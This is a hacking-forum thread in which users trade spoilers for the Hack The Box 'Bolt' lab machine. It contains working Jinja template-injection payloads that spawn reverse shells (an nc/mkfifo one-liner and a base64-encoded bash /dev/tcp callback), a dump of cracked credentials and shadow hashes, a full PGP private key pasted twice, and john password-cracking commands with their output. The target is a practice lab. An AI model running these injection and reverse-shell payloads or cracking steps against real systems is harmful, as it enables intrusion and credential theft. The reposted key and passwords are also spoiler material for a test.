TUTORIAL HTB Bolt [Discussion]
by pheonix2021 - September 25, 2021 at 06:34 PM
#97
(September 29, 2021 at 07:14 AM)rasengan Wrote: How did you guys crack the passphrase of private key? I tried with gpg2john and tried to crack with John, but it's taking hell of a time to reach just 2% of rockyou wordlist. Any tricks to crack it?

I am on VM, it took 5-10 min. BTW, your key is correct?
Reply
#98
(September 29, 2021 at 07:25 AM)Shashwat Shah Wrote:
(September 29, 2021 at 07:14 AM)rasengan Wrote: How did you guys crack the passphrase of private key? I tried with gpg2john and tried to crack with John, but it's taking hell of a time to reach just 2% of rockyou wordlist. Any tricks to crack it?

I am on VM, it took 5-10 min. BTW, your key is correct?

yea, key is legit. Someone here already shared the passphrase of the key, so I tried to crack private key with only couple dummy words and legit one. It worked, so the private key and converted hash is good.
Reply
#99
(September 26, 2021 at 10:00 AM)th3g3nt4lm4an Wrote:
(September 26, 2021 at 09:57 AM)varilya Wrote:
(September 26, 2021 at 09:49 AM)th3g3nt4lm4an Wrote: login password for the dashboard admin:deadbolt dunno what to do after this have the email for a user but the passbolt sends an email to that email so we cant log in stuck here for 5h can anyone give a hint please ?


how did you get the creds please?


check the image.tar

How and where did u find image.tar???
Reply
(September 26, 2021 at 04:06 PM)uiopuiop Wrote:
(September 26, 2021 at 04:00 PM)Shashwat Shah Wrote:
(September 26, 2021 at 03:58 PM)uiopuiop Wrote: Anyone know how to get user flag after shell?


How did u get the shell help me?

change profile name @ demo.bolt.htb to {{request|attr('application')|attr('\x5f\x5fglobals\x5f\x5f')|attr('\x5f\x5fgetitem\x5f\x5f')('\x5f\x5fbuiltins\x5f\x5f')|attr('\x5f\x5fgetitem\x5f\x5f')('\x5f\x5fimport\x5f\x5f')('os')|attr('popen')('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc <ip> <port> >/tmp/f')|attr('read')()}}

then confirm profile changes @ http://mail.bolt.htb

I tried changing my profile name, but it'd just say "internal server error" and not return a shell :(
Reply
(September 28, 2021 at 02:42 PM)Shashwat Shah Wrote:
(September 28, 2021 at 01:43 PM)Rabble6 Wrote:
(September 28, 2021 at 12:13 PM)mgh78 Wrote:
(September 28, 2021 at 08:12 AM)Shashwat Shah Wrote:
Invite_Code => XNSS-HSJW-3NGU-8XTJ
Admin_Page => admin:deadbolt
Database_Creds => passbolt:rT2;jW7<eY8!dX8}pQ8%
SSH_Creds => eddie:rT2;jW7<eY8!dX8}pQ8%
Passpharse_Of_Private_Key => merrychristmas  (Eddie Johnson)
Creds_Root => root:Z(2rmxsNW(Z?3=p/9s



root:$6$gID7DRyUwzMW69Ul$209oMxMiaHmg1iiIbvO0z7Z7Twe./PKnGZKede1XYfsqynZ/xLN5jAmtwMLFWpFLeV6vf8YSVsj87Q5zkbudX.:18879:0:99999:7:::
eddie:$6$hr9Mpb1gVh69X761$BBw9u5yqbhdMyhic/GDq.aRHBErqOw7d/uYrNOnzOtgBoiXz4HSdU1l2jzRxSa6PJMiNSQ6cGx1YtIUtqXboo/:18692:0:99999:7:::
clark:$6$W85bOWcfI3balSJ3$tT0hU4y9FeMhu9nlu8CRFt9RiQwO0VEWqA3oVNJWbR63/lO3YJIN1lKe5UdxrencyWBvbClv2LwqGtW6ZeDuk1:18683:0:99999:7:::



If this helped and supported, make sure u  +rep

If there is an error, contact me I will fix it.

how should i use a Creds_Root?
it can not used in ssh [email protected]

It should be able to be.  That's how I got in.

(September 28, 2021 at 07:34 AM)rasengan Wrote:
(September 28, 2021 at 12:34 AM)Rabble6 Wrote: If you have the private key, you can get the password by converting it with gpg2john, then cracking with john.

Once you've done that, you can decode the pgp message found in the secrets table in the passboltdb sql database.

Use the decoded message to get root.

How many ways are there to root the box?

Not sure...there seems to be a different way which needs you to enter eddie's email address into passbolt.bolt.htb and then recover the account, presumably with the Private PGP key, but I couldn't figure out how to get it to work, and once I tried the password found in the secret message to ssh into root, it wasn't needed.


U will not able to ssh into the root, it's disabled. u can ssh into any user and then su root

You're right, sorry for the confusion.
Reply
How do i save this hash i found: |admin|[email protected]|$1$sm1RceCh$rSd3PygnS/6jlFDfF2J5q.|| 
i tried the following saving it in a file named hash individually : 

|admin|[email protected]|$1$sm1RceCh$rSd3PygnS/6jlFDfF2J5q.||

admin:[email protected]:$1$sm1RceCh$rSd3PygnS/6jlFDfF2J5q.

$1$sm1RceCh$rSd3PygnS/6jlFDfF2J5q.||

$1$sm1RceCh$rSd3PygnS/6jlFDfF2J5q. 

----
I get this output : 
john --wordlist=/usr/share/wordlists/rockyou.txt hash
Using default input encoding: UTF-8
No password hashes loaded (see FAQ)

---

please i need hlep .
Reply
(September 27, 2021 at 05:28 PM)robo23 Wrote:
(September 27, 2021 at 04:46 PM)GSSidda7 Wrote:
(September 27, 2021 at 04:07 PM)robo23 Wrote:
(September 27, 2021 at 02:54 PM)GSSidda7 Wrote: where can i find private key?







u can find on eddie dir,

search grep -iR "PRIVATE KEY"

OR U CAN GO DIRECTLY TO

Binary file (.config/google-chrome/Default/Local Extension Settings/didegimhafipceonhjepacocaffmoppf/000003.log )matches



all the private keys are invalid in log file

no there will be some gibrish also in this search for pgp private key after finding go to vim and do :%s/\\\\r\\\\n/\r/g
u will get private key strucuture

(September 27, 2021 at 05:28 PM)robo23 Wrote:
(September 27, 2021 at 04:46 PM)GSSidda7 Wrote:
(September 27, 2021 at 04:07 PM)robo23 Wrote:
(September 27, 2021 at 02:54 PM)GSSidda7 Wrote: where can i find private key?
this is private key

-----BEGIN PGP PRIVATE KEY BLOCK-----
Version: OpenPGP.js v4.10.9
Comment: https://openpgpjs.org

xcMGBGA4G2EBCADbpIGoMv+O5sxsbYX3ZhkuikEiIbDL8JRvLX/r1KlhWlTi
fjfUozTU9a0OLuiHUNeEjYIVdcaAR89lVBnYuoneAghZ7eaZuiLz+5gaYczk
cpRETcVDVVMZrLlW4zhA9OXfQY/d4/OXaAjsU9w+8ne0A5I0aygN2OPnEKhU
RNa6PCvADh22J5vD+/RjPrmpnHcUuj+/qtJrS6PyEhY6jgxmeijYZqGkGeWU
+XkmuFNmq6km9pCw+MJGdq0b9yEKOig6/UhGWZCQ7RKU1jzCbFOvcD98YT9a
If70XnI0xNMS4iRVzd2D4zliQx9d6BqEqZDfZhYpWo3NbDqsyGGtbyJlABEB
AAH+CQMINK+e85VtWtjguB8IR+AfuDbIzHyKKvMfGStRhZX5cdsUfv5znicW
UjeGmI+w7iQ+WYFlmjFN/Qd527qOFOZkm6TgDMUVubQFWpeDvhM4F3Y+Fhua
jS8nQauoC87vYCRGXLoCrzvM03IpepDgeKqVV5r71gthcc2C/Rsyqd0BYXXA
iOe++biDBB6v/pMzg0NHUmhmiPnSNfHSbABqaY3WzBMtisuUxOzuvwEIRdac
2eEUhzU4cS8s1QyLnKO8ubvD2D4yVk+ZAxd2rJhhleZDiASDrIDT9/G5FDVj
QY3ep7tx0RTE8k5BE03NrEZi6TTZVa7MrpIDjb7TLzAKxavtZZYOJkhsXaWf
DRe3Gtmo/npea7d7jDG2i1bn9AJfAdU0vkWrNqfAgY/r4j+ld8o0YCP+76K/
7wiZ3YYOBaVNiz6L1DD0B5GlKiAGf94YYdl3rfIiclZYpGYZJ9Zbh3y4rJd2
AZkM+9snQT9azCX/H2kVVryOUmTP+uu+p+e51z3mxxngp7AE0zHqrahugS49
tgkE6vc6G3nG5o50vra3H21kSvv1kUJkGJdtaMTlgMvGC2/dET8jmuKs0eHc
Uct0uWs8LwgrwCFIhuHDzrs2ETEdkRLWEZTfIvs861eD7n1KYbVEiGs4n2OP
yF1ROfZJlwFOw4rFnmW4Qtkq+1AYTMw1SaV9zbP8hyDMOUkSrtkxAHtT2hxj
XTAuhA2i5jQoA4MYkasczBZp88wyQLjTHt7ZZpbXrRUlxNJ3pNMSOr7K/b3e
IHcUU5wuVGzUXERSBROU5dAOcR+lNT+Be+T6aCeqDxQo37k6kY6Tl1+0uvMp
eqO3/sM0cM8nQSN6YpuGmnYmhGAgV/Pj5t+cl2McqnWJ3EsmZTFi37Lyz1CM
vjdUlrpzWDDCwA8VHN1QxSKv4z2+QmXSzR5FZGRpZSBKb2huc29uIDxlZGRp
ZUBib2x0Lmh0Yj7CwI0EEAEIACAFAmA4G2EGCwkHCAMCBBUICgIEFgIBAAIZ
AQIbAwIeAQAhCRAcJ0Gj3DtKvRYhBN9Ca8ekqK9Y5Q7aDhwnQaPcO0q9+Q0H
/R2ThWBN8roNk7hCWO6vUH8Da1oXyR5jsHTNZAileV5wYnN+egxf1Yk9/qXF
nyG1k/IImCGf9qmHwHe+EvoDCgYpvMAQB9Ce1nJ1CPqcv818WqRsQRdLnyba
qx5j2irDWkFQhFd3Q806pVUYtL3zgwpupLdxPH/Bj2CvTIdtYD454aDxNbNt
zc5gVIg7esI2dnTkNnFWoFZ3+j8hzFmS6lJvJ0GN+Nrd/gAOkhU8P2KcDz74
7WQQR3/eQa0m6QhOQY2q/VMgfteMejlHFoZCbu0IMkqwsAINmiiAc7H1qL3F
U3vUZKav7ctbWDpJU/ZJ++Q/bbQxeFPPkM+tZEyAn/fHwwYEYDgbYQEIAJpY
HMNw6lcxAWuZPXYz7FEyVjilWObqMaAael9B/Z40fVH29l7ZsWVFHVf7obW5
zNJUpTZHjTQV+HP0J8vPL35IG+usXKDqOKvnzQhGXwpnEtgMDLFJc2jw0I6M
KeFfplknPCV6uBlznf5q6KIm7YhHbbyuKczHb8BgspBaroMkQy5LHNYXw2FP
rOUeNkzYjHVuzsGAKZZzo4BMTh/H9ZV1ZKm7KuaeeE2x3vtEnZXx+aSX+Bn8
Ko+nUJZEn9wzHhJwcsRGV94pnihqwlJsCzeDRzHlLORF7i57n7rfWkzIW8P7
XrU7VF0xxZP83OxIWQ0dXd5pA1fN3LRFIegbhJcAEQEAAf4JAwizGF9kkXhP
leD/IYg69kTvFfuw7JHkqkQF3cBf3zoSykZzrWNW6Kx2CxFowDd/a3yB4moU
KP9sBvplPPBrSAQmqukQoH1iGmqWhGAckSS/WpaPSEOG3K5lcpt5EneFC64f
a6yNKT1Z649ihWOv+vpOEftJVjOvruyblhl5QMNUPnvGADHdjZ9SRmo+su67
JAKMm0cf1opW9x+CMMbZpK9m3QMyXtKyEkYP5w3EDMYdM83vExb0DvbUEVFH
kERD10SVfII2e43HFgU+wXwYR6cDSNaNFdwbybXQ0quQuUQtUwOH7t/Kz99+
Ja9e91nDa3oLabiqWqKnGPg+ky0oEbTKDQZ7Uy66tugaH3H7tEUXUbizA6cT
Gh4htPq0vh6EJGCPtnyntBdSryYPuwuLI5WrOKT+0eUWkMA5NzJwHbJMVAlB
GquB8QmrJA2QST4v+/xnMLFpKWtPVifHxV4zgaUF1CAQ67OpfK/YSW+nqong
cVwHHy2W6hVdr1U+fXq9XsGkPwoIJiRUC5DnCg1bYJobSJUxqXvRm+3Z1wXO
n0LJKVoiPuZr/C0gDkek/i+p864FeN6oHNxLVLffrhr77f2aMQ4hnSsJYzuz
4sOO1YdK7/88KWj2QwlgDoRhj26sqD8GA/PtvN0lvInYT93YRqa2e9o7gInT
4JoYntujlyG2oZPLZ7tafbSEK4WRHx3YQswkZeEyLAnSP6R2Lo2jptleIV8h
J6V/kusDdyek7yhT1dXVkZZQSeCUUcQXO4ocMQDcj6kDLW58tV/WQKJ3duRt
1VrD5poP49+OynR55rXtzi7skOM+0o2tcqy3JppM3egvYvXlpzXggC5b1NvS
UCUqIkrGQRr7VTk/jwkbFt1zuWp5s8zEGV7aXbNI4cSKDsowGuTFb7cBCDGU
Nsw+14+EGQp5TrvCwHYEGAEIAAkFAmA4G2ECGwwAIQkQHCdBo9w7Sr0WIQTf
QmvHpKivWOUO2g4cJ0Gj3DtKvf4dB/9CGuPrOfIaQtuP25S/RLVDl8XHvzPm
oRdF7iu8ULcA9gTxPn8DNbtdZEnFHHOANAHnIFGgYS4vj3Dj9Q3CEZSSVvwg
6599FMcw9nGzypVOgqgQv8JGmIUeCipD10k8nHW7m9YBfQB04y9wJw99WNw/
Ic3vdhZ6NvsmLzYI21dnWD287sPj2tKAuhI0AqCEkiRwb4Z4CSGgJ5TgGML8
11Izrkqamzpc6mKBGi213tYH6xel3nDJv5TKm3AGwXsAhJjJw+9K0MNARKCm
YZFGLdtA/qMajW4/+T3DJ79YwPQOtCrFyHiWoIOTWfs4UhiUJIE4dTSsT/W0
PSwYYWlAywj5
=cqxZ
-----END PGP PRIVATE KEY BLOCK-----





u can find on eddie dir,

search grep -iR "PRIVATE KEY"

OR U CAN GO DIRECTLY TO

Binary file (.config/google-chrome/Default/Local Extension Settings/didegimhafipceonhjepacocaffmoppf/000003.log )matches



all the private keys are invalid in log file

no there will be some gibrish also in this search for pgp private key after finding go to vim and do :%s/\\\\r\\\\n/\r/g
u will get private key strucuture
How to convert private key to proper format? I am getting error in line no 53.
-----BEGIN PGP PRIVATE KEY BLOCK-----
Version: OpenPGP.js v4.10.9
Comment: https://openpgpjs.org

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
J6V/[email protected]/WQKJ3duRt
1VrD5poP49+OynR55rXtzi7skOM+0o2tcqy3JppM3egvYvXlpzXggC5b1NvS
UCUqIkrGQRr7VTk/jwkbFt1zuWp5s8zEGV7aXbNI4cSKDsowGuTFb7cBCDGU
Nsw+14+EGQp5TrvCwHYEGAEIAAkFAmA4G2ECGwwAIQkQHCdBo9w7Sr0WIQTf
QmvHpKivWOUO2g4cJ0Gj3DtKvf4dB/9CGuPrOfIaQtuP25S/RLVDl8XHvzPm
oRdF7iu8ULcA9gTxPn8DNbtdZEnFHHOANAHnIFGgYS4vj3Dj9Q3CEZSSVvwg
6599FMcw9nGzypVOgqgQv8JGmIUeCipD10k8nHW7m9YBfQB04y9wJw99WNw/
Ic3vdhZ6NvsmLzYI21dnWD287sPj2tKAuhI0AqCEkiRwb4Z4CSGgJ5TgGML8
11Izrkqamzpc6mKBGi213tYH6xel3nDJv5TKm3AGwXsAhJjJw+9K0MNARKCm
YZFGLdtA/qMajW4/+T3DJ79YwPQOtCrFyHiWoIOTWfs4UhiUJIE4dTSsT/W0
PSwYYWlAywj5
=cqxZ
-----END PGP PRIVATE KEY BLOCK-----
Reply
(September 26, 2021 at 04:06 PM)uiopuiop Wrote:
(September 26, 2021 at 04:00 PM)Shashwat Shah Wrote:
(September 26, 2021 at 03:58 PM)uiopuiop Wrote: Anyone know how to get user flag after shell?


How did u get the shell help me?

change profile name @ demo.bolt.htb to {{request|attr('application')|attr('\x5f\x5fglobals\x5f\x5f')|attr('\x5f\x5fgetitem\x5f\x5f')('\x5f\x5fbuiltins\x5f\x5f')|attr('\x5f\x5fgetitem\x5f\x5f')('\x5f\x5fimport\x5f\x5f')('os')|attr('popen')('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc <ip> <port> >/tmp/f')|attr('read')()}}

then confirm profile changes @ http://mail.bolt.htb

How did you spot the SSTI vulnerability? By fuzzing? I did not found a corresponding CVE.

(September 26, 2021 at 04:11 PM)fadel142 Wrote:
(September 26, 2021 at 04:00 PM)Shashwat Shah Wrote:
(September 26, 2021 at 03:58 PM)uiopuiop Wrote: Anyone know how to get user flag after shell?


How did u get the shell help me?


its SSTI bro on update profile and see the confirmation messages on mail.bolt.htb, after you click that link there was the another messages again that show the SSTI output

{% with a = request["application"]["\x5f\x5fglobals\x5f\x5f"]["\x5f\x5fbuiltins\x5f\x5f"]["\x5f\x5fimport\x5f\x5f"]("os")["popen"]("echo -n YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNC40LzkwMDEgMD4mMQ== | base64 -d | bash")["read"]() %} a {% endwith %}

use this it will works too, dont forget to set up your listener.

dont forget to give me rep+ thanks

Hi bro,

how did you spot the SSTI vulnerability? By fuzzing? I did not found a corresponding CVE.
Reply
(September 29, 2021 at 07:25 AM)Shashwat Shah Wrote:
(September 29, 2021 at 07:14 AM)rasengan Wrote: How did you guys crack the passphrase of private key? I tried with gpg2john and tried to crack with John, but it's taking hell of a time to reach just 2% of rockyou wordlist. Any tricks to crack it?

I am on VM, it took 5-10 min. BTW, your key is correct?


john --wordlist=/usr/share/wordlists/rockyou.txt --format=gpg private_key.txt

(September 28, 2021 at 12:34 AM)Rabble6 Wrote: If you have the private key, you can get the password by converting it with gpg2john, then cracking with john.

Once you've done that, you can decode the pgp message found in the secrets table in the passboltdb sql database.

Use the decoded message to get root.

How to decrypt pgp or have any webpage online?
Reply
Vaya que si costó esta máquina xD
Reply
https://sqliteviewer.app/#/db.sqlite3/table/User/

you can also use

https://sqliteonline.com/

and we found the user "admin" pass so we used john to crack it and got this

<!-- john results for admin -->
[email protected]~/htb/bolt took 4s
❯ john --wordlist=/opt/SecLists/Passwords/rockyou.txt ./db-User-1-password
--------------------------------------------------------------------------
The library attempted to open the following supporting CUDA libraries,
but each of them failed.  CUDA-aware support is disabled.
libcuda.so.1: cannot open shared object file: No such file or directory
libcuda.dylib: cannot open shared object file: No such file or directory
/usr/lib64/libcuda.so.1: cannot open shared object file: No such file or directory
/usr/lib64/libcuda.dylib: cannot open shared object file: No such file or directory
If you are not interested in CUDA-aware support, then run with
--mca opal_warn_on_missing_libcuda 0 to suppress this message.  If you are interested
in CUDA-aware support, then try setting LD_LIBRARY_PATH to the location
of libcuda.so.1 to get passed this issue.
--------------------------------------------------------------------------
Warning: detected hash type "md5crypt", but the string is also recognized as "md5crypt-long"
Use the "--format=md5crypt-long" option to force loading these as that type instead
Warning: detected hash type "md5crypt", but the string is also recognized as "md5crypt-opencl"
Use the "--format=md5crypt-opencl" option to force loading these as that type instead
Using default input encoding: UTF-8
Loaded 1 password hash (md5crypt, crypt(3) $1$ (and variants) [MD5 128/128 AVX 4x3])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
deadbolt        (admin)
1g 0:00:00:02 DONE (2021-11-27 22:10) 0.4405g/s 76123p/s 76123c/s 76123C/s deathrow1..curlyfry
Use the "--show" option to display all of the cracked passwords reliably
Session completed

<!-- john results for admin -->


<!-- hash -->
admin:$1$sm1RceCh$rSd3PygnS/6jlFDfF2J5q.
<!-- hash -->

after logging in to the http version of the website http://bolt.htb we are relocated to the admin page
Reply

Possibly Related Threads…
Thread Author Replies Views Last Post
TUTORIAL HTB Fingerprint [Discussion] TDis7 49 3,806 18 minutes ago
Last Post: harry123
TUTORIAL HTB Anubis Discussion dadamnmayne 168 56,238 Yesterday at 08:42 AM
Last Post: joeydalips
TUTORIAL HTB Hancliffe [Discussion] pheonix2021 130 30,786 Yesterday at 02:07 AM
Last Post: hacker00

 Users browsing this thread: 3 Guest(s)